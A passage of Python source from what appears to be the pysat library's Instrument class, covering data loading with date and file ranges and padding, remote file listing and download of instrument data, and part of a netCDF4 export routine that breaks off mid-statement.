based upon the dates associated with the Instrument's files. Date
range is inclusive for yr, doy but exclusive for end_yr, end_doy.
(default=None)
end_doy : integer
Used when loading a range of dates, from yr, doy to end_yr, end_doy
based upon the dates associated with the Instrument's files. Date
range is inclusive for yr, doy but exclusive for end_yr, end_doy.
(default=None)
date : dt.datetime
Date to load data. pysat will load all files with an associated
date between date and date + 1 day (default=None)
end_date : dt.datetime
Used when loading a range of data from `date` to `end_date` based
upon the dates associated with the Instrument's files. Date range
is inclusive for date but exclusive for end_date. (default=None)
fname : str or NoneType
Filename to be loaded (default=None)
stop_fname : str or NoneType
Used when loading a range of filenames from `fname` to `stop_fname`,
inclusive. (default=None)
verifyPad : bool
If True, padding data not removed for debugging. Padding
parameters are provided at Instrument instantiation. (default=False)
**kwargs : dict
Dictionary of keywords that may be options for specific instruments.
Raises
------
TypeError
For incomplete or incorrect input
ValueError
For input incompatible with Instrument set-up
Note
----
Loads data for a chosen instrument into .data. Any functions chosen
by the user and added to the custom processing queue (.custom.attach)
are automatically applied to the data before it is available to
user in .data.
A mixed combination of `.load()` keywords such as `yr` and `date` are
not allowed.
Note
-----
`end` kwargs have exclusive ranges (stop before the condition is
reached), while `stop` kwargs have inclusive ranges (stop once the
condition is reached).
Examples
--------
::
import datetime as dt
import pysat
inst = pysat.Instrument('pysat', 'testing')
# load a single day by year and day of year
inst.load(2009, 1)
# load a single day by date
date = dt.datetime(2009, 1, 1)
inst.load(date=date)
# load a single file, first file in this example
inst.load(fname=inst.files[0])
# load a range of days, data between
# Jan. 1st (inclusive) - Jan. 3rd (exclusive)
inst.load(2009, 1, 2009, 3)
# same procedure using datetimes
date = dt.datetime(2009, 1, 1)
end_date = dt.datetime(2009, 1, 3)
inst.load(date=date, end_date=end_date)
# same procedure using filenames
# note the change in index due to inclusive slicing on filenames!
inst.load(fname=inst.files[0], stop_fname=inst.files[1])
"""
# Add the load kwargs from initialization those provided on input
for lkey in self.kwargs['load'].keys():
# Only use the initialized kwargs if a request hasn't been
# made to alter it in the method call
if lkey not in kwargs.keys():
kwargs[lkey] = self.kwargs['load'][lkey]
# Set options used by loading routine based upon user input
if (yr is not None) and (doy is not None):
if doy < 1 or (doy > 366):
estr = ''.join(('Day of year (doy) is only valid between and ',
'including 1-366.'))
raise ValueError(estr)
# Verify arguments make sense, in context
_check_load_arguments_none([fname, stop_fname, date, end_date],
raise_error=True)
# Convert yr/doy to a date
date = dt.datetime.strptime("{:.0f} {:.0f}".format(yr, doy),
"%Y %j")
self._set_load_parameters(date=date, fid=None)
if (end_yr is not None) and (end_doy is not None):
if end_doy < 1 or (end_doy > 366):
estr = ''.join(('Day of year (end_doy) is only valid ',
'between and including 1-366.'))
raise ValueError(estr)
end_date = dt.datetime.strptime(
"{:.0f} {:.0f}".format(end_yr, end_doy), "%Y %j")
self.load_step = end_date - date
elif (end_yr is not None) or (end_doy is not None):
estr = ''.join(('Both end_yr and end_doy must be set, ',
'or neither.'))
raise ValueError(estr)
else:
# increment end by a day if none supplied
self.load_step = dt.timedelta(days=1)
curr = self.date
elif date is not None:
# Verify arguments make sense, in context
_check_load_arguments_none([fname, stop_fname, yr, doy, end_yr,
end_doy], raise_error=True)
# Ensure date portion from user is only year, month, day
self._set_load_parameters(date=date, fid=None)
date = utils.time.filter_datetime_input(date)
# Increment after determining the desired step size
if end_date is not None:
# Support loading a range of dates
self.load_step = end_date - date
else:
# Defaults to single day load
self.load_step = dt.timedelta(days=1)
curr = date
elif fname is not None:
# Verify arguments make sense, in context
_check_load_arguments_none([yr, doy, end_yr, end_doy, date,
end_date], raise_error=True)
# Date will have to be set later by looking at the data
self._set_load_parameters(date=None,
fid=self.files.get_index(fname))
# Check for loading by file range
if stop_fname is not None:
# Get index for both files so the delta may be computed
idx1 = self.files.get_index(fname)
idx2 = self.files.get_index(stop_fname)
diff = idx2 - idx1
if diff < 0:
estr = ''.join(('`stop_fname` must occur at a later date ',
'than `fname`. Swapping filename inputs ',
'will resolve the error.'))
raise ValueError(estr)
else:
self.load_step = diff
else:
# Increment one file at a time
self.load_step = 0
curr = self._fid.copy()
elif _check_load_arguments_none([yr, doy, end_yr, end_doy, date,
end_date, fname, stop_fname]):
# Empty call, treat as if all data requested
if self.multi_file_day:
estr = ''.join(('`load()` is not supported with multi_file_day',
'=True.'))
raise ValueError(estr)
if self.pad is not None:
estr = ' '.join(('`load()` is not supported with data padding',
'enabled.'))
raise ValueError(estr)
date = self.files.files.index[0]
end_date = self.files.files.index[-1] + dt.timedelta(days=1)
self._set_load_parameters(date=date, fid=None)
curr = date
self.load_step = end_date - date
else:
estr = 'Unknown or incomplete input combination.'
raise TypeError(estr)
self.orbits._reset()
# If `pad` or `multi_file_day` is True, need to load three days/files
loop_pad = self.pad if self.pad is not None \
else dt.timedelta(seconds=0)
# Check for consistency between loading range and data padding, if any
if self.pad is not None:
if self._load_by_date:
tdate = dt.datetime(2009, 1, 1)
if tdate + self.load_step < tdate + loop_pad:
estr = ''.join(('Data padding window must be shorter than ',
'data loading window. Load a greater ',
'range of data or shorten the padding.'))
raise ValueError(estr)
else:
# Loading by file
wstr = ''.join(('Using a data padding window ',
'when loading by file can produce unexpected ',
'results whenever the padding window ',
'is longer than the range of data in a file. ',
'Improving the breadth of the padding window ',
'is planned for the future.'))
logger.warning(wstr)
if (self.pad is not None) or self.multi_file_day:
if self._empty(self._next_data) and self._empty(self._prev_data):
# Data has not already been loaded for previous and next days
# load data for all three
logger.info('Initializing three day/file window')
# Using current date or fid
self._prev_data, self._prev_meta = self._load_prev()
self._curr_data, self._curr_meta = self._load_data(
date=self.date, fid=self._fid, inc=self.load_step,
load_kwargs=kwargs)
self._next_data, self._next_meta = self._load_next()
else:
if self._next_data_track == curr:
# Moving forward in time
del self._prev_data
self._prev_data = self._curr_data
self._prev_meta = self._curr_meta
self._curr_data = self._next_data
self._curr_meta = self._next_meta
self._next_data, self._next_meta = self._load_next()
elif self._prev_data_track == curr:
# Moving backward in time
del self._next_data
self._next_data = self._curr_data
self._next_meta = self._curr_meta
self._curr_data = self._prev_data
self._curr_meta = self._prev_meta
self._prev_data, self._prev_meta = self._load_prev()
else:
# Jumped in time/or switched from filebased to date based
# access
del self._prev_data
del self._curr_data
del self._next_data
self._prev_data, self._prev_meta = self._load_prev()
self._curr_data, self._curr_meta = self._load_data(
date=self.date, fid=self._fid, inc=self.load_step,
load_kwargs=kwargs)
self._next_data, self._next_meta = self._load_next()
# Make sure datetime indices for all data is monotonic
if not self._index(self._prev_data).is_monotonic_increasing:
self._prev_data.sort_index(inplace=True)
if not self._index(self._curr_data).is_monotonic_increasing:
self._curr_data.sort_index(inplace=True)
if not self._index(self._next_data).is_monotonic_increasing:
self._next_data.sort_index(inplace=True)
# Make tracking indexes consistent with new loads
if self._load_by_date:
self._next_data_track = curr + self.load_step
self._prev_data_track = curr - self.load_step
else:
# File and date loads have to be treated differently
# due to change in inclusive/exclusive range end
# treatment. Loading by file is inclusive.
self._next_data_track = curr + self.load_step + 1
self._prev_data_track = curr - self.load_step - 1
# Attach data to object
if not self._empty(self._curr_data):
# The data being added isn't empty, so copy the data values
# and the meta data values
self.data = self._curr_data.copy()
self.meta = self._curr_meta.copy()
else:
# If a new default/empty Meta is added here then it creates
# a bug by potentially overwriting existing, good meta data
# with an empty Meta object. For example, this will happen if
# a multi-day analysis ends on a day with no data.
# Do not re-introduce this issue.
self.data = self._null_data.copy()
# Load by file or by date, as specified
if self._load_by_date:
# Multi-file days can extend past a single day, only want data
# from a specific date if loading by day. Set up times for
# the possible data padding coming up.
first_time = self.date
first_pad = self.date - loop_pad
last_time = self.date + self.load_step
last_pad = self.date + self.load_step + loop_pad
want_last_pad = False
elif (not self._load_by_date) and (not self.multi_file_day):
# Loading by file, can't be a multi_file-day flag situation
first_time = self._index(self._curr_data)[0]
first_pad = first_time - loop_pad
last_time = self._index(self._curr_data)[-1]
last_pad = last_time + loop_pad
want_last_pad = True
else:
raise ValueError(" ".join(("Can't have multi_file_day and load",
"by file.")))
# Pad data based upon passed parameter
if (not self._empty(self._prev_data)) & (not self.empty):
stored_data = self.data # .copy()
temp_time = copy.deepcopy(self.index[0])
# Pad data using access mechanisms that works for both pandas
# and xarray
self.data = self._prev_data.copy()
# __getitem__ used below to get data from instrument object.
# Details for handling pandas and xarray are different and
# handled by __getitem__
self.data = self[first_pad:temp_time]
if not self.empty:
if self.index[-1] == temp_time:
self.data = self[:-1]
self.concat_data(stored_data, prepend=False)
else:
self.data = stored_data
if (not self._empty(self._next_data)) & (not self.empty):
stored_data = self.data # .copy()
temp_time = copy.deepcopy(self.index[-1])
# Pad data using access mechanisms that work for both pandas
# and xarray
self.data = self._next_data.copy()
self.data = self[temp_time:last_pad]
if not self.empty:
if (self.index[0] == temp_time):
self.data = self[1:]
self.concat_data(stored_data, prepend=True)
else:
self.data = stored_data
self.data = self[first_pad:last_pad]
# Want exclusive end slicing behavior from above
if not self.empty:
if (self.index[-1] == last_pad) & (not want_last_pad):
self.data = self[:-1]
# If self.pad is False, load single day
else:
self.data, meta = self._load_data(date=self.date, fid=self._fid,
inc=self.load_step,
load_kwargs=kwargs)
if not self.empty:
self.meta = meta
# If only some metadata included, define the remaining variables
warn_default = False
for var in self.variables:
if var not in self.meta:
default_warn = "".join(["Metadata set to defaults, as",
" they were missing in the ",
"Instrument"])
warn_default = True
self.meta[var] = {self.meta.labels.name: var,
self.meta.labels.notes: default_warn}
if warn_default:
warnings.warn(default_warn, stacklevel=2)
# Check if load routine actually returns meta
if self.meta.data.empty:
self.meta[self.variables] = {self.meta.labels.name: self.variables}
# If loading by file set the yr, doy, and date
if not self._load_by_date:
if self.pad is not None:
temp = first_time
else:
temp = self.index[0]
self.date = dt.datetime(temp.year, temp.month, temp.day)
self.yr, self.doy = utils.time.getyrdoy(self.date)
# Ensure data is unique and monotonic. Check occurs after all the data
# padding loads, or individual load. Thus, it can potentially check
# issues with padding or with raw data
if not (self.index.is_monotonic_increasing and self.index.is_unique):
message = ''
if not self.index.is_unique:
message = ' '.join((message, 'Loaded data is not unique.'))
if not self.index.is_monotonic_increasing:
message = ' '.join((message, 'Loaded data is not',
'monotonically increasing. '))
if self.strict_time_flag:
raise ValueError(' '.join((message, 'To continue to use data,'
'set inst.strict_time_flag=False',
'before loading data')))
else:
warnings.warn(message, stacklevel=2)
# Apply the instrument preprocess routine, if data present
if not self.empty:
# Does not require self as input, as it is a partial func
self._preprocess_rtn(**self.kwargs['preprocess'])
# Clean data, if data is present and cleaning requested
if (not self.empty) & (self.clean_level != 'none'):
self._clean_rtn(**self.kwargs['clean'])
# Apply custom functions via the nanokernel in self.custom
if not self.empty:
self.custom_apply_all()
# Remove the excess data padding, if any applied
if (self.pad is not None) & (not self.empty) & (not verifyPad):
self.data = self[first_time: last_time]
if not self.empty:
if (self.index[-1] == last_time) & (not want_last_pad):
self.data = self[:-1]
# Transfer any extra attributes in meta to the Instrument object
self.meta.transfer_attributes_to_instrument(self)
self.meta.mutable = False
sys.stdout.flush()
return
def remote_file_list(self, start=None, stop=None, **kwargs):
    """List remote files for chosen instrument.

    Parameters
    ----------
    start : dt.datetime or NoneType
        Starting time for file list. A None value will start with the
        first file found. (default=None)
    stop : dt.datetime or NoneType
        Ending time for the file list. A None value will stop with the
        last file found. (default=None)
    **kwargs : dict
        Dictionary of keywords that may be options for specific
        instruments. The keyword arguments 'user' and 'password' are
        expected for remote databases requiring sign in or registration.

    Returns
    -------
    Series
        pandas Series of filenames indexed by date and time

    Note
    ----
    Default behaviour is to return all files. User may additionally
    specify a given year, year/month, or year/month/day combination to
    return a subset of available files.

    """
    # Explicit arguments join the optional keyword set
    kwargs["start"] = start
    kwargs["stop"] = stop

    # Fold in kwargs stored at Instrument instantiation without
    # clobbering values supplied directly to this call
    stored_kwargs = self.kwargs.get('list_remote_files', {})
    for user_key, user_val in stored_kwargs.items():
        kwargs.setdefault(user_key, user_val)

    # Delegate to the instrument-specific remote listing routine
    return self._list_remote_files_rtn(self.tag, self.inst_id, **kwargs)
def remote_date_range(self, start=None, stop=None, **kwargs):
    """Returns first and last date for remote data.

    Parameters
    ----------
    start : dt.datetime or NoneType
        Starting time for file list. A None value will start with the
        first file found. (default=None)
    stop : dt.datetime or NoneType
        Ending time for the file list. A None value will stop with the
        last file found. (default=None)
    **kwargs : dict
        Dictionary of keywords that may be options for specific
        instruments. The keyword arguments 'user' and 'password' are
        expected for remote databases requiring sign in or registration.

    Returns
    -------
    List
        First and last datetimes obtained from remote_file_list

    Note
    ----
    Default behaviour is to search all files. User may additionally
    specify a given year, year/month, or year/month/day combination to
    return a subset of available files.

    """
    # The remote listing is indexed by datetime, so its index bounds
    # are the remote date range
    files = self.remote_file_list(start=start, stop=stop, **kwargs)
    return [files.index[0], files.index[-1]]
def download_updated_files(self, **kwargs):
    """Grabs a list of remote files, compares to local, then downloads new
    files.

    Parameters
    ----------
    **kwargs : dict
        Dictionary of keywords that may be options for specific instruments

    Note
    ----
    Data will be downloaded to pysat_data_dir/platform/name/tag

    If Instrument bounds are set to defaults they are updated
    after files are downloaded.

    """
    # Get list of remote files
    remote_files = self.remote_file_list()
    if remote_files.empty:
        logger.warning(' '.join(('No remote files found. Unable to',
                                 'download latest data.')))
        return

    # Get current list of local files
    self.files.refresh()
    local_files = self.files.files

    # Compare local and remote files. First look for dates that are in
    # remote but not in local (`in` tests the Series index)
    new_dates = [date for date in remote_files.index
                 if date not in local_files]

    # Now compare filenames between common dates as it may be a new version
    # or revision. This will have a problem with filenames that are
    # faking daily data from monthly.
    for date in local_files.index:
        if date in remote_files.index:
            if remote_files[date] != local_files[date]:
                new_dates.append(date)
    logger.info(' '.join(('Found {} files that'.format(len(new_dates)),
                          'are new or updated.')))

    # Download data for dates in new_dates (also includes new names)
    self.download(date_array=new_dates, **kwargs)
def download(self, start=None, stop=None, freq='D', date_array=None,
             **kwargs):
    """Download data for given Instrument object from start to stop.

    Parameters
    ----------
    start : pandas.datetime or NoneType
        Start date to download data. When `start`, `stop`, and
        `date_array` are all None, defaults to yesterday. (default=None)
    stop : pandas.datetime or NoneType
        Stop date (inclusive) to download data. When `start`, `stop`,
        and `date_array` are all None, defaults to tomorrow.
        (default=None)
    freq : string
        Stepsize between dates for season, 'D' for daily, 'M' monthly
        (see pandas) (default='D')
    date_array : list-like
        Sequence of dates to download date for. Takes precedence over
        start and stop inputs (default=None)
    **kwargs : dict
        Dictionary of keywords that may be options for specific
        instruments. The keyword arguments 'user' and 'password' are
        expected for remote databases requiring sign in or registration.

    Raises
    ------
    ValueError
        If the download directory cannot be created.

    Note
    ----
    Data will be downloaded to pysat_data_dir/platform/name/tag

    If Instrument bounds are set to defaults they are updated
    after files are downloaded.

    """
    # Make sure directories are there, otherwise create them
    try:
        os.makedirs(self.files.data_path)
    except OSError as err:
        if err.errno != errno.EEXIST:
            # Ok if directories already exist, otherwise exit with an
            # error that includes the message from the original error.
            # Python 3 exceptions have no `.message` attribute; use
            # str(err) and chain the original for full context.
            msg = ''.join(('There was a problem creating the path: ',
                           self.files.data_path,
                           ', to store downloaded data for ', self.platform,
                           self.name, '. ', str(err)))
            raise ValueError(msg) from err

    if start is None and stop is None and date_array is None:
        # Defaults for downloads are set here rather than in the method
        # signature since method defaults are only set once! If an
        # Instrument object persists longer than a day then the download
        # defaults would no longer be correct. Dates are always correct
        # in this setup.
        logger.info(''.join(['Downloading the most recent data by ',
                             'default (yesterday through tomorrow).']))
        start = self.yesterday()
        stop = self.tomorrow()
    elif stop is None and date_array is None:
        stop = start + dt.timedelta(days=1)

    logger.info('Downloading data to: {}'.format(self.files.data_path))

    if date_array is None:
        # Create range of dates for downloading data. Make sure dates
        # are whole days
        start = utils.time.filter_datetime_input(start)
        stop = utils.time.filter_datetime_input(stop)
        date_array = utils.time.create_date_range(start, stop, freq=freq)

    # Add necessary kwargs to the optional kwargs, then fold in any
    # download kwargs stored at instantiation without clobbering
    kwargs['tag'] = self.tag
    kwargs['inst_id'] = self.inst_id
    kwargs['data_path'] = self.files.data_path
    for kwarg in self.kwargs['download']:
        if kwarg not in kwargs:
            kwargs[kwarg] = self.kwargs['download'][kwarg]

    # Download the data, if enough data is requested
    if len(date_array) > 0:
        self._download_rtn(date_array, **kwargs)

        # Get the current file date range
        first_date = self.files.start_date
        last_date = self.files.stop_date

        logger.info('Updating pysat file list')
        self.files.refresh()

        # If instrument object has default bounds, update them
        if len(self.bounds[0]) == 1:
            # Get current bounds
            curr_bound = self.bounds
            if self._iter_type == 'date':
                if (curr_bound[0][0] == first_date
                        and curr_bound[1][0] == last_date):
                    logger.info('Updating instrument object bounds by date')
                    self.bounds = (self.files.start_date,
                                   self.files.stop_date, curr_bound[2],
                                   curr_bound[3])
            if self._iter_type == 'file':
                # Account for the fact the file datetimes may not land
                # exactly at start or end of a day.
                dsel1 = slice(first_date, first_date
                              + dt.timedelta(hours=23, minutes=59,
                                             seconds=59))
                dsel2 = slice(last_date, last_date
                              + dt.timedelta(hours=23, minutes=59,
                                             seconds=59))
                if (curr_bound[0][0] == self.files[dsel1][0]
                        and curr_bound[1][0] == self.files[dsel2][-1]):
                    logger.info('Updating instrument object bounds by file')
                    dsel1 = slice(self.files.start_date,
                                  self.files.start_date
                                  + dt.timedelta(hours=23, minutes=59,
                                                 seconds=59))
                    dsel2 = slice(self.files.stop_date,
                                  self.files.stop_date
                                  + dt.timedelta(hours=23, minutes=59,
                                                 seconds=59))
                    self.bounds = (self.files[dsel1][0],
                                   self.files[dsel2][-1],
                                   curr_bound[2], curr_bound[3])
    else:
        logger.warning(''.join(['Requested download over an empty date ',
                                'range: {:} to {:}'.format(start, stop)]))
    return
def to_netcdf4(self, fname=None, base_instrument=None, epoch_name='Epoch',
zlib=False, complevel=4, shuffle=True,
preserve_meta_case=False, export_nan=None,
unlimited_time=True):
"""Stores loaded data into a netCDF4 file.
Parameters
----------
fname : str
full path to save instrument object to
base_instrument : pysat.Instrument
used as a comparison, only attributes that are present with
self and not on base_instrument are written to netCDF
epoch_name : str
Label in file for datetime index of Instrument object
zlib : bool
Flag for engaging zlib compression (True - compression on)
complevel : int
an integer between 1 and 9 describing the level of compression
desired. Ignored if zlib=False. (default=4)
shuffle : bool
The HDF5 shuffle filter will be applied before compressing the data.
This significantly improves compression. Ignored if zlib=False.
(default=True)
preserve_meta_case : bool
if True, then the variable strings within the MetaData object, which
preserves case, are used to name variables in the written netCDF
file.
If False, then the variable strings used to access data from the
Instrument object are used instead. By default, the variable strings
on both the data and metadata side are the same, though this
relationship may be altered by a user. (default=False)
export_nan : list or None
By default, the metadata variables where a value of NaN is allowed
and written to the netCDF4 file is maintained by the Meta object
attached to the pysat.Instrument object. A list supplied here
will override the settings provided by Meta, and all parameters
included will be written to the file. If not listed
and a value is NaN then that attribute simply won't be included in
the netCDF4 file. (default=None)
unlimited_time : bool
If True, then the main epoch dimension will be set to 'unlimited'
within the netCDF4 file. (default=True)
Note
----
Stores 1-D data along dimension 'epoch' - the date time index.
Stores higher order data (e.g. dataframes within series) separately
- The name of the main variable column is used to prepend subvariable
names within netCDF, var_subvar_sub
- A netCDF4 dimension is created for each main variable column
with higher order data; first dimension Epoch
- The index organizing the data stored as a dimension variable
- from_netcdf4 uses the variable dimensions to reconstruct data
structure
All attributes attached to instrument meta are written to netCDF attrs
with the exception of 'Date_End', 'Date_Start', 'File', 'File_Date',
'Generation_Date', and 'Logical_File_ID'. These are defined within
to_netCDF at the time the file is written, as per the adopted standard,
SPDF ISTP/IACG Modified for NetCDF. Attributes 'Conventions' and
'Text_Supplement' are given default values if not present.
"""
# Check export nans first
if export_nan is None:
export_nan = self.meta._export_nan
# Base_instrument used to define the standard attributes attached
# to the instrument object. Any additional attributes added
# to the main input Instrument will be written to the netCDF4
base_instrument = Instrument() if base_instrument is None \
else base_instrument
# Begin processing metadata for writing to the file. Look to see if
# user supplied a list of export keys corresponding to internally
# tracked metadata within pysat
export_meta = self.generic_meta_translator(self.meta)
if self._meta_translation_table is None:
# Didn't find a translation table, using the strings
# attached to the supplied pysat.Instrument object
export_name_labels = [self.meta.labels.name]
export_units_labels = [self.meta.labels.units]
export_desc_labels = [self.meta.labels.desc]
export_notes_labels = [self.meta.labels.notes]
else:
# User supplied labels in translation table
export_name_labels = self._meta_translation_table['name']
export_units_labels = self._meta_translation_table['units']
export_desc_labels = self._meta_translation_table['desc']
export_notes_labels = self._meta_translation_table['notes']
logger.info(' '.join(('Using Metadata Translation Table:',
str(self._meta_translation_table))))
# Apply instrument specific post-processing to the export_meta
if hasattr(self._export_meta_post_processing, '__call__'):
export_meta = self._export_meta_post_processing(export_meta)
# Check if there are multiple variables with same characters
# but with different case
lower_variables = [var.lower() for var in self.variables]
unique_lower_variables = np.unique(lower_variables)
if len(unique_lower_variables) != len(lower_variables):
raise ValueError(' '.join(('There are multiple variables with the',
'same name but different case which',
'results in a loss of metadata. Please',
'make the names unique.')))
# General process for writing data:
# 1) take care of the EPOCH information,
# 2) iterate over the variable colums in Instrument.data and check
# the type of data,
# - if 1D column:
# A) do simple write (type is not an object)
# B) if it is an object, then check if writing strings
# C) if not strings, write object
# - if column is a Series of Frames, write as 2D variables
# 3) metadata must be filtered before writing to netCDF4, since
# string variables can't have a fill value
with netCDF4.Dataset(fname, mode='w', format='NETCDF4') as out_data:
# number of items, yeah
num = len(self.index)
# write out the datetime index
if unlimited_time:
out_data.createDimension(epoch_name, None)
else:
out_data.createDimension(epoch_name, num)
cdfkey = out_data.createVariable(epoch_name, 'i8',
dimensions=(epoch_name),
zlib=zlib,
complevel=complevel,
shuffle=shuffle)
# grab existing metadata for Epoch or create suitable info
if epoch_name in self.meta:
new_dict = export_meta[self.meta.var_case_name(epoch_name)]
else:
# create empty shell
new_dict = {}
# update required and basic information if not present
for export_name_label in export_name_labels:
if export_name_label not in new_dict:
new_dict[export_name_label] = epoch_name
for export_units_label in export_units_labels:
if export_units_label not in new_dict:
new_dict[export_units_label] = \
'Milliseconds since 1970-1-1 00:00:00'
for export_desc_label in export_desc_labels:
if export_desc_label not in new_dict:
new_dict[export_desc_label] = \
'Milliseconds since 1970-1-1 00:00:00'
for export_notes_label in export_notes_labels:
if export_notes_label not in new_dict:
new_dict[export_notes_label] = ''
new_dict['calendar'] = 'standard'
new_dict['Format'] = 'i8'
new_dict['Var_Type'] = 'data'
if self.index.is_monotonic_increasing:
new_dict['MonoTon'] = 'increase'
elif self.index.is_monotonic_decreasing:
new_dict['MonoTon'] = 'decrease'
new_dict['Time_Base'] = 'Milliseconds since 1970-1-1 00:00:00'
new_dict['Time_Scale'] = 'UTC'
new_dict = self._filter_netcdf4_metadata(new_dict, np.int64,
export_nan=export_nan)
# attach metadata
cdfkey.setncatts(new_dict)
# Attach the time index to the data
cdfkey[:] = (self.index.values.astype(np.int64)
* 1.E-6).astype(np.int64)
# iterate over all of the columns in the Instrument dataframe
# check what kind of data we are dealing with, then store
for key in self.variables:
# get information on type data we are dealing with
# data is data in proper type (multiformat support)
# coltype is the direct type, np.int64
# and datetime_flag lets you know if the data is full of time
# information
if preserve_meta_case:
# use the variable case stored in the MetaData object
case_key = self.meta.var_case_name(key)
else:
# use variable names used by user when working with data
case_key = key
data, coltype, datetime_flag = self._get_data_info(self[key])
# operate on data based upon type
if self[key].dtype != np.dtype('O'):
# not an object, normal basic 1D data
cdfkey = out_data.createVariable(case_key,
coltype,
dimensions=(epoch_name),
zlib=zlib,
complevel=complevel,
shuffle=shuffle)
# attach any meta data, after filtering for standards
try:
# attach dimension metadata
new_dict = export_meta[case_key]
new_dict['Depend_0'] = epoch_name
new_dict['Display_Type'] = 'Time Series'
new_dict['Format'] = self._get_var_type_code(coltype)
new_dict['Var_Type'] = 'data'
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype, export_nan=export_nan)
cdfkey.setncatts(new_dict)
except KeyError as err:
logger.info(' '.join((str(err), '\n',
' '.join(('Unable to find'
'MetaData for',
key)))))
# assign data
if datetime_flag:
# datetime is in nanoseconds, storing milliseconds
cdfkey[:] = (data.values.astype(coltype)
* 1.0E-6).astype(coltype)
else:
# not datetime data, just store as is
cdfkey[:] = data.values.astype(coltype)
# back to main check on type of data to write
else:
# It is a Series of objects. First, figure out what the
# individual object typess are. Then, act as needed.
# Use info in coltype to get real datatype of object
if (coltype == str):
cdfkey = out_data.createVariable(case_key,
coltype,
dimensions=epoch_name,
zlib=zlib,
complevel=complevel,
shuffle=shuffle)
# Attach any meta data
try:
# Attach dimension metadata
new_dict = export_meta[case_key]
new_dict['Depend_0'] = epoch_name
new_dict['Display_Type'] = 'Time Series'
new_dict['Format'] = self._get_var_type_code(
coltype)
new_dict['Var_Type'] = 'data'
# No FillValue or FillVal allowed for strings
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype, remove=True,
export_nan=export_nan)
# Really attach metadata now
cdfkey.setncatts(new_dict)
except KeyError:
logger.info(' '.join(('Unable to find MetaData for',
key)))
# Time to actually write the data now
cdfkey[:] = data.values
# Still dealing with an object, not just a Series of
# strings. Maps to `if` check on coltypes, being
# string-based.
else:
# Presuming a series with a dataframe or series in each
# location start by collecting some basic info on
# dimensions sizes, names, then create corresponding
# netCDF4 dimensions total dimensions stored for object
# are epoch plus ones created below
dims = np.shape(self[key].iloc[0])
obj_dim_names = []
if len(dims) == 1:
# generally working with higher dimensional data
# pad dimensions so that the rest of the code works
# for either a Series or a Frame
dims = (dims[0], 0)
for i, dim in enumerate(dims[:-1]):
# don't need to go over last dimension value,
# it covers number of columns (if a frame)
obj_dim_names.append(case_key)
out_data.createDimension(obj_dim_names[-1], dim)
# create simple tuple with information needed to create
# the right dimensions for variables that will
# be written to file
var_dim = tuple([epoch_name] + obj_dim_names)
# We need to do different things if a series or
# dataframe stored
try:
# start by assuming it is a dataframe
# get list of subvariables
iterable = self[key].iloc[0].columns
# store our newfound knowledge, we are dealing with
# a series of DataFrames
is_frame = True
except AttributeError:
# turns out data is Series of Series
# which doesn't have columns
iterable = [self[key].iloc[0].name]
is_frame = False
# find location within main variable that actually
# has subvariable data (not just empty frame/series)
# so we can determine what the real underlying data
# types are
good_data_loc = 0
for jjj in np.arange(len(self.data)):
if len(self.data[key].iloc[0]) > 0:
data_loc = jjj
break
# found a place with data, if there is one
# now iterate over the subvariables, get data info
# create netCDF4 variables and store the data
# stored name is variable_subvariable
for col in iterable:
if is_frame:
# we are working with a dataframe so
# multiple subvariables stored under a single
# main variable heading
idx = self[key].iloc[good_data_loc][col]
data, coltype, _ = self._get_data_info(idx)
cdfkey = out_data.createVariable(
'_'.join((case_key, col)), coltype,
dimensions=var_dim, zlib=zlib,
complevel=complevel, shuffle=shuffle)
# attach any meta data
try:
new_dict = export_meta['_'.join((case_key,
col))]
new_dict['Depend_0'] = epoch_name
new_dict['Depend_1'] = obj_dim_names[-1]
new_dict['Display_Type'] = 'Spectrogram'
new_dict['Format'] = \
self._get_var_type_code(coltype)
new_dict['Var_Type'] = 'data'
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype,
export_nan=export_nan)
cdfkey.setncatts(new_dict)
except KeyError as err:
logger.info(' '.join((str(err), '\n',
'Unable to find',
'MetaData for',
', '.join((key,
col)))))
# Attach data. It may be slow to repeatedly
# call the store method as well astype method
# below collect data into a numpy array, then
# write the full array in one go
temp_cdf_data = np.zeros(
(num, dims[0])).astype(coltype)
for i in range(num):
temp_cdf_data[i, :] = \
self[key].iloc[i][col].values
# Write data
cdfkey[:, :] = temp_cdf_data.astype(coltype)
else:
# We are dealing with a Series. Get
# information from within the series
idx = self[key].iloc[good_data_loc]
data, coltype, _ = self._get_data_info(idx)
cdfkey = out_data.createVariable(
case_key + '_data', coltype,
dimensions=var_dim, zlib=zlib,
complevel=complevel, shuffle=shuffle)
# Attach any meta data
try:
new_dict = export_meta[case_key]
new_dict['Depend_0'] = epoch_name
new_dict['Depend_1'] = obj_dim_names[-1]
new_dict['Display_Type'] = 'Spectrogram'
new_dict['Format'] = \
self._get_var_type_code(coltype)
new_dict['Var_Type'] = 'data'
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype,
export_nan=export_nan)
# Really attach metadata now
cdfkey.setncatts(new_dict)
except KeyError as err:
logger.info(' '.join((str(err), '\n',
'Unable to find ',
'MetaData for,',
key)))
# attach data
temp_cdf_data = np.zeros(
(num, dims[0])).astype(coltype)
for i in range(num):
temp_cdf_data[i, :] = self[i, key].values
# write data
cdfkey[:, :] = temp_cdf_data.astype(coltype)
# We are done storing the actual data for the given
# higher order variable. Now we need to store the index
# for all of that fancy data.
# Get index information
idx = good_data_loc
data, coltype, datetime_flag = self._get_data_info(
self[key].iloc[idx].index)
# Create dimension variable for to store index in
# netCDF4
cdfkey = out_data.createVariable(case_key, coltype,
dimensions=var_dim,
zlib=zlib,
complevel=complevel,
shuffle=shuffle)
# Work with metadata
new_dict = export_meta[case_key]
new_dict['Depend_0'] = epoch_name
new_dict['Depend_1'] = obj_dim_names[-1]
new_dict['Display_Type'] = 'Time Series'
new_dict['Format'] = self._get_var_type_code(coltype)
new_dict['Var_Type'] = 'data'
if datetime_flag:
for export_name_label in export_name_labels:
new_dict[export_name_label] = epoch_name
for export_units_label in export_units_labels:
new_dict[export_units_label] = \
'Milliseconds since 1970-1-1 00:00:00'
new_dict = self._filter_netcdf4_metadata(
new_dict, coltype, export_nan=export_nan)
# Set metadata dict
cdfkey.setncatts(new_dict)
# Set data
temp_cdf_data = np.zeros((num,
dims[0])).astype(coltype)
for i in range(num):
temp_cdf_data[i, :] = self[i, key].index.values
cdfkey[:, :] = (temp_cdf_data.astype(coltype)
* 1.E-6).astype(coltype)
else:
if self[key].iloc[data_loc].index.name is not None:
for export_name_label in export_name_labels:
new_dict[export_name_label] = \
